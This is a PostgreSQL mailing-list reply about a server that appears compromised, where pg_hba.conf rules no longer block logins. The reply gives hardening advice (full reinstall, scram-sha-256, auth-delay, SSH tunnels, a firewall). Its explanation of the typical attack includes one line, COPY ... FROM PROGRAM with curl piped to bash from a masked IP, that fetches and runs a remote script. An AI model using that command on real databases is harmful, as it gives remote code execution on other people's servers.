Re: How to confirm the pg_hba.conf service is correctly working - Mailing list pgsql-general
| From | Imre Samu |
|---|---|
| Subject | Re: How to confirm the pg_hba.conf service is correctly working |
| Date | |
| Msg-id | CAJnEWw=xdEhw=ZBrM0=oM6oSdJwwUujKSbVzQwc-hpw802O2YQ@mail.gmail.com Whole thread Raw |
| In response to | Re: How to confirm the pg_hba.conf service is correctly working (shing dong <s7eqs7eq@gmail.com>) |
| List | pgsql-general |
> Have checked select * from pg_hba_file_rules results are consistent with pg_hba.conf
> any ip and user still can login in db
> any ip and user still can login in db
Any proxy? port/ip - forwarding running in the background?
in the next time check the "client_addr".
- SELECT usename, client_addr FROM pg_stat_activity where client_addr is not null ;
> a Postgres DB that was Hacked l
> When I remove pg software and reinstall pg software
I agree with others;
- please re-install the full system! ( not just the PostgreSQL! )
Usually, the attack sequence:
- open port, brute force attack + COPY ... FROM PROGRAM 'curl http://1xx.1x.7x.1/1.sh | bash';
so you can expect "anything" installed and running hidden in the background.
> host VJ VJ_USER 10.10.10.1/32 md5
imho:
- use different ports
- change "md5" to "scram-sha-256"
- maybe: add https://www.postgresql.org/docs/10/auth-delay.html
- for administrating use SSH tunnels: https://www.postgresql.org/docs/10/ssh-tunnels.html ( and use a firewall - for closing all external ports or use SSL )
Regards,
Imre
shing dong <s7eqs7eq@gmail.com> ezt írta (időpont: 2021. dec. 23., Cs, 11:15):
Your original post stated that you only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf file.
However the result of the select is considerably more ?DEARI have tested this feature , only had
host VJ VJ_USER 10.10.10.1/32 md5
in the pg_hba.conf fileHave checked select * from pg_hba_file_rules results are consistent with pg_hba.confany ip and user still can login in dbWhen I remove pg software and reinstall pg software , the function of pg_hba is working ,represent that the location and content of pg_hba.conf are correctSuspect that the function of pg_hba is destroyed?Dave Cramer <davecramer@postgres.rocks> 於 2021年12月22日 週三 下午6:58寫道:On Tue, 21 Dec 2021 at 22:57, shing dong <s7eqs7eq@gmail.com> wrote:Dear DaveThe result after reload is
2021-12-21 23:02:43.829 -04,,,36848,,61bf6ecf.8ff0,9,,2021-12-19 13:41:35 -04,,0,LOG,00000,"received SIGHUP, reloading configuration files",,,,,,,,,""
No other error message
------------------------------------------result of select * from pg_hba_file_rules
line_number,type,database,user_name,address,netmask,auth_method,options,error
84,local,{all},{all},,,md5,,
86,host,{all},{all},127.0.0.1,255.255.255.255,md5,,
87,host,{replication},{replica},127.0.0.1,255.255.255.255,md5,,
88,host,{replication},{replica},10.34.21.85,255.255.255.255,md5,,
89,host,{replication},{repl},10.37.12.13,255.255.255.255,md5,,
92,host,{product},{querysysuser},13.75.66.131,255.255.255.255,md5,,
93,host,{product},{collector},10.32.61.98,255.255.255.255,md5,,
94,host,{product},{collector_new},10.34.61.98,255.255.255.255,md5,,
95,host,{product},"{collector,collector_new}",10.34.61.99,255.255.255.255,md5,,
96,host,{product},{MylIZ8UUIFO7KZBh1hXEnCPHqugzAm},10.21.99.177,255.255.255.255,md5,,
99,host,{product},{product_member},10.33.132.41,255.255.255.255,md5,,
100,host,{product},{product_member},10.33.132.42,255.255.255.255,md5,,
101,host,{product},{product_member},10.33.132.43,255.255.255.255,md5,,
102,host,{product},{product_member},10.33.132.44,255.255.255.255,md5,,
103,host,{product},{product_member},10.33.132.45,255.255.255.255,md5,,
104,host,{product},{product_member},10.33.132.51,255.255.255.255,md5,,
105,host,{product},{product_member},10.33.132.52,255.255.255.255,md5,,
106,host,{product},{product_member},10.33.132.53,255.255.255.255,md5,,
107,host,{product},{product_member},10.33.132.54,255.255.255.255,md5,,
108,host,{product},{product_member},10.33.132.55,255.255.255.255,md5,,
109,host,{product},{product_member},10.33.132.61,255.255.255.255,md5,,
110,host,{product},{product_member},10.33.132.62,255.255.255.255,md5,,
111,host,{product},{product_member},10.33.132.63,255.255.255.255,md5,,
112,host,{product},{product_member},10.33.132.64,255.255.255.255,md5,,
113,host,{product},{product_member},10.33.132.65,255.255.255.255,md5,,
114,host,{product},{product_member},10.34.32.41,255.255.255.255,md5,,
115,host,{product},{product_member},10.34.32.42,255.255.255.255,md5,,
116,host,{product},{product_member},10.34.32.43,255.255.255.255,md5,,
117,host,{product},{product_member},10.34.32.44,255.255.255.255,md5,,
118,host,{product},{product_member},10.34.32.45,255.255.255.255,md5,,
119,host,{product},{product_member},10.34.32.46,255.255.255.255,md5,,
120,host,{product},{product_member},10.34.32.51,255.255.255.255,md5,,
121,host,{product},{product_member},10.34.32.52,255.255.255.255,md5,,
122,host,{product},{product_member},10.34.32.53,255.255.255.255,md5,,
123,host,{product},{product_member},10.34.32.54,255.255.255.255,md5,,
124,host,{product},{product_member},10.34.32.55,255.255.255.255,md5,,
125,host,{product},{product_member},10.34.32.56,255.255.255.255,md5,,
126,host,{product},{product_member},10.34.32.61,255.255.255.255,md5,,
127,host,{product},{product_member},10.34.32.62,255.255.255.255,md5,,
128,host,{product},{product_member},10.34.32.63,255.255.255.255,md5,,
129,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
130,host,{product},{product_member},10.34.32.65,255.255.255.255,md5,,
131,host,{product},{product_member},10.34.32.66,255.255.255.255,md5,,
132,host,{product},{product_member},10.34.32.57,255.255.255.255,md5,,
133,host,{product},{product_member},10.34.32.64,255.255.255.255,md5,,
135,host,{product},{product_agent},10.34.32.21,255.255.255.255,md5,,
136,host,{product},{product_agent},10.34.32.22,255.255.255.255,md5,,
137,host,{product},{product_agent},10.34.32.23,255.255.255.255,md5,,
138,host,{product},{product_agent},10.34.32.31,255.255.255.255,md5,,
139,host,{product},{product_agent},10.34.32.32,255.255.255.255,md5,,
140,host,{product},{product_agent},10.34.32.33,255.255.255.255,md5,,
141,host,{product},{product_agent},10.34.32.34,255.255.255.255,md5,,
142,host,{product},{product_agent},10.34.32.35,255.255.255.255,md5,,
143,host,{product},{product_agent},10.34.32.36,255.255.255.255,md5,,
144,host,{product},{product_agent},10.34.32.37,255.255.255.255,md5,,
145,host,{product},{product_agent},10.34.32.38,255.255.255.255,md5,,
146,host,{product},{product_agent},10.33.132.21,255.255.255.255,md5,,
147,host,{product},{product_agent},10.33.132.31,255.255.255.255,md5,,
148,host,{product},{product_agent},10.33.132.32,255.255.255.255,md5,,
149,host,{product},{product_agent},10.33.132.33,255.255.255.255,md5,,
150,host,{product},{product_agent},10.33.132.34,255.255.255.255,md5,,
153,host,{product},{product_dba},10.20.16.101,255.255.255.255,md5,,
154,host,{product},{product_dba},10.20.16.102,255.255.255.255,md5,,
155,host,{product},{product_dba},10.20.16.103,255.255.255.255,md5,,
156,host,{product},{product_dba},10.20.16.104,255.255.255.255,md5,,
157,host,{product},{product_dba},10.20.16.105,255.255.255.255,md5,,
161,host,{product},{dbcheck},10.34.21.118,255.255.255.255,md5,,
165,host,{product},{product_dba},10.3.10.2,255.255.255.255,md5,,
168,host,{product},{product_dba},10.3.10.13,255.255.255.255,md5,,Hmmm for some reason I did not reply to the list.At any rate.Your original post stated that you only hadin the pg_hba.conf file.However the result of the select is considerably more ?Dave Cramer
pgsql-general by date: